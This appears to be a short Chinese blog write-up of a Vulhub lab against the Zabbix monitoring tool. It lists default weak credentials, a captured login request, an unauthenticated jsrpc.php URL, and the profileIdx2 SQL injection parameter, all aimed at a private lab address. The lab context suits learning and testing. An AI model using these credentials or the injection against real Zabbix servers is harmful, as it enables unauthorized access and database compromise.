【vluhub】zabbix漏洞

介绍:

zabbix是对服务器资源状态例如、内存空间、CPU、程序运行状态进行检测、设置预警值、短信设置等功能等一款开源工具。配置不当存在未授权,SQL注入漏洞

弱口令

name=admin&password=zabbix

name=guest&password=

POST /index.php HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.203.12:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.203.12:8080/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6cmua046gkq78jai8ija37f7f5; tab=0; zbx_sessionid=37a3075c6ba46f1956c5d8d851c2e635
Connection: keep-alive

sid=56c5d8d851c2e635&form_refresh=1&name=admin&password=zabbix&autologin=1&enter=Sign+in

未授权访问直接进入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

SQL注入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

profileIdx2参数存在注入点

可使用sqlmap跑,此处忽略

相关推荐
LuckyTHP1 天前
zabbix 7.0 安装(服务器、前端、代理等)
zabbix
与君共勉121382 天前
Zabbix proxy 主动模式的实现
运维·学习·zabbix
Amrian_robot2 天前
Zabbix 6.0 部署
运维·zabbix
运维_攻城狮7 天前
centos7 zabbix监控nginx的pv和uv和status_code
nginx·zabbix·uv
运维_攻城狮8 天前
centos7.X zabbix监控参数以及邮件报警和钉钉报警
钉钉·zabbix
alfiy13 天前
zabbix 6.0 监控clickhouse(单机)
clickhouse·zabbix
book012114 天前
Linux运维_Rocky8 安装配置Zabbix
linux·运维·服务器·zabbix
可观测性用观测云14 天前
Zabbix 数据对接观测云最佳实践
zabbix
最新小梦15 天前
Zabbix 监控自动化
运维·自动化·zabbix
乐维_lwops15 天前
Zabbix进阶实战!将告警推送到Syslog服务器详细教程
服务器·zabbix·zabbix告警